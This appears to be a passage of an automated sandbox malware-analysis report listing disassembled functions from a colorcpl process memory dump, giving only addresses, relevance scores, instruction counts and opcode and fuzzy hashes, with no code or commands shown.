                                                                                                                                          • Instruction ID: 91f4a91920e2c22082765fb10d8588d22b5725b7bf08dd8cb64978f0ada15319
                                                                                                                                          • Opcode Fuzzy Hash: 8f5df0e2ddcc62e2bf2d7daaa5abf24c8e96ee8604da25c3b5942e42bb4b2fab
                                                                                                                                          • Instruction Fuzzy Hash: 3EA1F231E097599FDB128B64C948F9E7BB4AB01764F410265EB10AB2D1DF789E40CB93
                                                                                                                                          Function 22760185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b73f62b41e9df34acbebe36432582590d4a6a21c48000ef35aeeb6dbbe19ce41
                                                                                                                                          • Instruction ID: 50937f0c711af3f733478ec628b025287654891d7bdb4ae099a1a2c182fc7149
                                                                                                                                          • Opcode Fuzzy Hash: b73f62b41e9df34acbebe36432582590d4a6a21c48000ef35aeeb6dbbe19ce41
                                                                                                                                          • Instruction Fuzzy Hash: 08A1BD71A09716DFEB25CF65CA90BBAB7B1FF54314F104129EE05A7281EB34E911CB90
                                                                                                                                          Function 227F4500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6b198f50a34c16ea94697bf7325aa5cd5060574c15825ae6ffd20bad3c13fe46
                                                                                                                                          • Instruction ID: 5ffa9ac13a62a5cf4a3e9c65c95ec9e205c6f3c78ced8962b48d629d4b6bdf15
                                                                                                                                          • Opcode Fuzzy Hash: 6b198f50a34c16ea94697bf7325aa5cd5060574c15825ae6ffd20bad3c13fe46
                                                                                                                                          • Instruction Fuzzy Hash: ADA19972A0D751AFC712CF24CA90B5AB7E9FF58714F410A38E6899B792D334E940CB91
                                                                                                                                          Function 227F2B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                          • Instruction ID: 93e1eaf0ea1cd2388a5a376e3df5572c1dca96149ad95c72b74be99e776c59ba
                                                                                                                                          • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                          • Instruction Fuzzy Hash: F1B15871E0871ADFCB18CFA9C980BADB7B5FF58304F10816AE914AB351D770A941CB90
                                                                                                                                          Function 227A60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 18169d23de2d04b929603bb2b371c8a0bd6aeb776da8dcb0f124aa2685cbe1e6
                                                                                                                                          • Instruction ID: 15b20ab457c4d608ee0cf759657a5e8b4e6201c308ac63985dc7375329feace7
                                                                                                                                          • Opcode Fuzzy Hash: 18169d23de2d04b929603bb2b371c8a0bd6aeb776da8dcb0f124aa2685cbe1e6
                                                                                                                                          • Instruction Fuzzy Hash: 21916271E08315AFDF15CFA4D8A4BAFBBB5AF48724F114269E610AB381D734D901DBA0
                                                                                                                                          Function 2273E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 39308392bd4141a0e3fcabe48c0be8509dd3b011506b3d9722155ba4650aec72
                                                                                                                                          • Instruction ID: 92245f42805ed5ff4c0827760dadb244e6385c5f90a944dfff9a656f8118eee7
                                                                                                                                          • Opcode Fuzzy Hash: 39308392bd4141a0e3fcabe48c0be8509dd3b011506b3d9722155ba4650aec72
                                                                                                                                          • Instruction Fuzzy Hash: 25912432A08725DBD722CF68C988B6A77A1EF98724F014165ED44EB382E634DD41CB92
                                                                                                                                          Function 22776ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 45b7d6ba92b8eb0afc9d2bdfc9756f0ad05a448253c1b418d513ee70c81599d1
                                                                                                                                          • Instruction ID: 730205695b40d5ce359fb96105af480af25d50e7f50ffffbcd1bed86eff2b489
                                                                                                                                          • Opcode Fuzzy Hash: 45b7d6ba92b8eb0afc9d2bdfc9756f0ad05a448253c1b418d513ee70c81599d1
                                                                                                                                          • Instruction Fuzzy Hash: 8181A1B1A047159BDF14CF69C990ABEBBF5FB48700F10852EE945E7645E334E940CBA0
                                                                                                                                          Function 227EAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                          • Instruction ID: ffc8e316261b4b1bdceb068e244a95d7560f4f568579e72c4097c11e77167478
                                                                                                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                          • Instruction Fuzzy Hash: 4B819431A043099FCF19CF99C990AAEB7F2FF84314F148569D91AAB355DB78DA01CB60
                                                                                                                                          Function 2275E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b58a1f0c7f042c5d2008dbb4577afcbb456882469446a946d48b0cd291bf365e
                                                                                                                                          • Instruction ID: 4eb2686088cf6a8b95f28ac3bf4103e22ef56518bdb145ada8b0376c2a234fad
                                                                                                                                          • Opcode Fuzzy Hash: b58a1f0c7f042c5d2008dbb4577afcbb456882469446a946d48b0cd291bf365e
                                                                                                                                          • Instruction Fuzzy Hash: D7815A71A08709EFDB11CFA9C980BEEFBBAFB88344F104429E955A7250D770AD55CB60
                                                                                                                                          Function 2273C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0360d0c623ba506b1b70e9b8685f04e9bf4fb4a0ac7da606347e8de0b4cbea39
                                                                                                                                          • Instruction ID: 97930952dfbcd9881f6a4dd97b0707a65612aedc9bb1f3a11ea53119f161a660
                                                                                                                                          • Opcode Fuzzy Hash: 0360d0c623ba506b1b70e9b8685f04e9bf4fb4a0ac7da606347e8de0b4cbea39
                                                                                                                                          • Instruction Fuzzy Hash: 8871E1B5D09729DBCB16CF59C990BAEBBB0FF58700F50465EE941AB391E3349940CBA0
                                                                                                                                          Function 227D47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e96b4a4d5276676ce62e5cc65aa7cc25f845a7c2524e5df32ec6a40bc8713a6d
                                                                                                                                          • Instruction ID: 421d95966a6d679bbc82862a472da83d9f442c9e8e401d9e81cde73cdc4ad8e3
                                                                                                                                          • Opcode Fuzzy Hash: e96b4a4d5276676ce62e5cc65aa7cc25f845a7c2524e5df32ec6a40bc8713a6d
                                                                                                                                          • Instruction Fuzzy Hash: A471C271A49314EFCB08CF96CA54A9ABBF8FF91304F01456AEA51AB2D8C775D900DF18
                                                                                                                                          Function 2273260B Relevance: .2, Instructions: 201COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e55da06b803f8743679b9f84db73705945001219b3260bc00eff19a99b3640e1
                                                                                                                                          • Instruction ID: 496db2422eaff1fee7e4cab17b1c3f67316234d0046db990b499f40b434bab86
                                                                                                                                          • Opcode Fuzzy Hash: e55da06b803f8743679b9f84db73705945001219b3260bc00eff19a99b3640e1
                                                                                                                                          • Instruction Fuzzy Hash: C171BD716087829FC302CF28C584B2AB7E5FF94710F0485AAE898CB752DB74DD45CB92
                                                                                                                                          Function 227B62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7709bfda42361032bac15783f78b816201460bafd4cc22b30710106f60692abd
                                                                                                                                          • Instruction ID: bbc3fce44595449e259dad085ea0d2a2487f4db1daf9bb6a70907a53ed9e77e6
                                                                                                                                          • Opcode Fuzzy Hash: 7709bfda42361032bac15783f78b816201460bafd4cc22b30710106f60692abd
                                                                                                                                          • Instruction Fuzzy Hash: 5F710132248B01AFD722CF24C944F6AB7E5EF44764F104928E7259B6E1D775EA44CB50
                                                                                                                                          Function 227A035C Relevance: .2, Instructions: 198COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                          • Instruction ID: b7060173acd698f2a1142a0831e3e6a32937086e77095139a6e0be39503b9c01
                                                                                                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                          • Instruction Fuzzy Hash: A7715D71A00719EFCB12CFA5C994EAEBBB9FF88714F104569E505EB250DB34EA41CB90
                                                                                                                                          Function 22728AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5d14e2396d338c734491923b96010605f0b23cd7a9eaba65b3441ee9cca82a1e
                                                                                                                                          • Instruction ID: 10b9611c36e387cdf54394a8f57448da2a0ba05240e748ef370bfca1a3daaaa2
                                                                                                                                          • Opcode Fuzzy Hash: 5d14e2396d338c734491923b96010605f0b23cd7a9eaba65b3441ee9cca82a1e
                                                                                                                                          • Instruction Fuzzy Hash: 9C819C72A0C7558FCB04CF98C680B9EB7B2BB58315F92422DD900AB785C7B9DD40DBA5
                                                                                                                                          Function 227F8324 Relevance: .2, Instructions: 192COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2210aaa719cb63fef99c48e61821bfd624395c056dd03194b227e1dacb8b136b
                                                                                                                                          • Instruction ID: 4de9271c461cc0da872be4732aa4b180a93bad09f5b95b4b7f06cb2ff52feea2
                                                                                                                                          • Opcode Fuzzy Hash: 2210aaa719cb63fef99c48e61821bfd624395c056dd03194b227e1dacb8b136b
                                                                                                                                          • Instruction Fuzzy Hash: 43711B71E08319AFDB16CF94C845FEEBBB9EF14354F604219EA24B7290D774AA05CB90
                                                                                                                                          Function 227DA250 Relevance: .2, Instructions: 184COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 269e59cadd9226dba903c6f20af4ab0f2cf636bc6a4c2534dd9ec9a294e9c2d7
                                                                                                                                          • Instruction ID: 3392d8ee847567222b5494c2a41ac58b98f2b42c165d5bd9359500af0b5d44b1
                                                                                                                                          • Opcode Fuzzy Hash: 269e59cadd9226dba903c6f20af4ab0f2cf636bc6a4c2534dd9ec9a294e9c2d7
                                                                                                                                          • Instruction Fuzzy Hash: 0651BC73509751AFD712CA68C898E5BB7E8FBC5754F000929BE50DB250D778ED04CBA2
                                                                                                                                          Function 227C8350 Relevance: .2, Instructions: 161COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8e0e98ecd404bd5a7505cc59650606dc0dfa0a8d6436d76b427ef356687752a9
                                                                                                                                          • Instruction ID: 9b0eb1d0e322bdb51c8ff983e98216066bc056ed65823e94089ee81e1b72bbd1
                                                                                                                                          • Opcode Fuzzy Hash: 8e0e98ecd404bd5a7505cc59650606dc0dfa0a8d6436d76b427ef356687752a9
                                                                                                                                          • Instruction Fuzzy Hash: 9651D170904704DFD722CF66C984B9BFBF8BF94714F50461EE296A76A0D7B0AA41CB90
                                                                                                                                          Function 2275E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 35e4139f5cfe430e76096a5d94bfc8554ba2a77b9405e7612223dad9352585df
                                                                                                                                          • Instruction ID: 780293c62adc561f57cc9183c2c6e74a7966d62f9e504319fd196cc438330027
                                                                                                                                          • Opcode Fuzzy Hash: 35e4139f5cfe430e76096a5d94bfc8554ba2a77b9405e7612223dad9352585df
                                                                                                                                          • Instruction Fuzzy Hash: 77516871249B14DFD722DF64CAC4F9AB3B9FF58784F40082AE951972A1D734E950CB90
                                                                                                                                          Function 227C4180 Relevance: .2, Instructions: 156COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e121b26ccc784956a4f564fe3d08fc9a2a8d34064f012e205018de7aa3381fc6
                                                                                                                                          • Instruction ID: 32951148042b2316de2a9b9cabcd1aeb13e9fcb8a3f11e5b9424d8c4fe94aad7
                                                                                                                                          • Opcode Fuzzy Hash: e121b26ccc784956a4f564fe3d08fc9a2a8d34064f012e205018de7aa3381fc6
                                                                                                                                          • Instruction Fuzzy Hash: C05143B16083419FC344CF29D991A6BB7E5BBC8308F404A3DF999E7250EB30DA05CB92
                                                                                                                                          Function 227445B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                          • Instruction ID: 6519a536071426725bbce4b123be10aadcc49ebc244a8738f61b781eb010a723
                                                                                                                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                          • Instruction Fuzzy Hash: 1C51AE71E0831AABCF16CF94C454FEEBBB5AF48354F004169EA10AB240DB34DE45DBA1
                                                                                                                                          Function 227AE9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                          • Instruction ID: 1787f16ddfed04406440a26369c4fa6a3f5616c48c2a477c716d54c8da8bccc0
                                                                                                                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                          • Instruction Fuzzy Hash: 96519331D09319EFDB118B90C9A8FAEBBB5AB00378F114775EA5277190D7749E40CB91
                                                                                                                                          Function 227E8B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a416529ac5e7659a12545dc790bc5dfbb7ef49f9e35d9cf58379c86d5a108d84
                                                                                                                                          • Instruction ID: bbb43d80ebfce0c009a6cb26abae714532b48cc3903b6696556488c3ffabe4e1
                                                                                                                                          • Opcode Fuzzy Hash: a416529ac5e7659a12545dc790bc5dfbb7ef49f9e35d9cf58379c86d5a108d84
                                                                                                                                          • Instruction Fuzzy Hash: CC41F47070A7109BC715CB29CA94F6BB79AEF91364F808659E95F8B3B0DB34D801C6B1
                                                                                                                                          Function 227ACBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 03ec5b8541cd2a27f5fdcba9810c24f765b143e8cb2a3debf4d9664899a31ee4
                                                                                                                                          • Instruction ID: 6fdfbe7d5cd0cc811b73a36951bc49a1a33dbbaaeb0fc7f95a6132a5bf70d86c
                                                                                                                                          • Opcode Fuzzy Hash: 03ec5b8541cd2a27f5fdcba9810c24f765b143e8cb2a3debf4d9664899a31ee4
                                                                                                                                          • Instruction Fuzzy Hash: 12518D71905325EFCB10CFA9C9A0A9EBBB9FF48328B504A19D946A7345D734EE01CF90
                                                                                                                                          Function 2275A430 Relevance: .1, Instructions: 139COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 017594796f5b1dfd20ef0832443e26e407bc576295dce593d2274a7e50906782
                                                                                                                                          • Instruction ID: dc1615ee26d80d686527fbd8a862c34f8e59e598311d4432f0e468fd5f028e82
                                                                                                                                          • Opcode Fuzzy Hash: 017594796f5b1dfd20ef0832443e26e407bc576295dce593d2274a7e50906782
                                                                                                                                          • Instruction Fuzzy Hash: DA413931B4C3519BDB2ADF699984F2AB764EB58304F40053CEE16AB2C1D7B9D914C750
                                                                                                                                          Function 227EA9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                          • Instruction ID: 1c61d124b433dfc408ae92adf12385836445fc585bbb91212fb7ddbb2ab2fee3
                                                                                                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                          • Instruction Fuzzy Hash: 03411772A097169FC715CF24C984A6BB3E9FF90314B05466EE91B8B641EB34ED08C7E4
                                                                                                                                          Function 227501F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6c5bfd884391f47e58a031061e2820a99a1749eaa0cf95103647a4f892b5ed6c
                                                                                                                                          • Instruction ID: a754d64cbed83536e52c9bca93dd76dcc2ed2750621eb7b33a8b608e4937d19a
                                                                                                                                          • Opcode Fuzzy Hash: 6c5bfd884391f47e58a031061e2820a99a1749eaa0cf95103647a4f892b5ed6c
                                                                                                                                          • Instruction Fuzzy Hash: 36417436A093299BCB05CFA8C540BEEF7B4AF4C714F50826EE915BB240E7359D51CBA4
                                                                                                                                          Function 2274EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 71586252befe7464a79152c8619d3bc45bbc3c8ae60d5ba27ffd5f815e73ca5e
                                                                                                                                          • Instruction ID: 3ac4dd7cae3f5bfb4f6e03b4c22fda9e7c23a66ef1aa569af64156c83a139242
                                                                                                                                          • Opcode Fuzzy Hash: 71586252befe7464a79152c8619d3bc45bbc3c8ae60d5ba27ffd5f815e73ca5e
                                                                                                                                          • Instruction Fuzzy Hash: 3941C172A083018FD712CF25C884A1BB7F5FF98328F404969EA56C7252EF74E944CB52
                                                                                                                                          Function 22762750 Relevance: .1, Instructions: 137COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
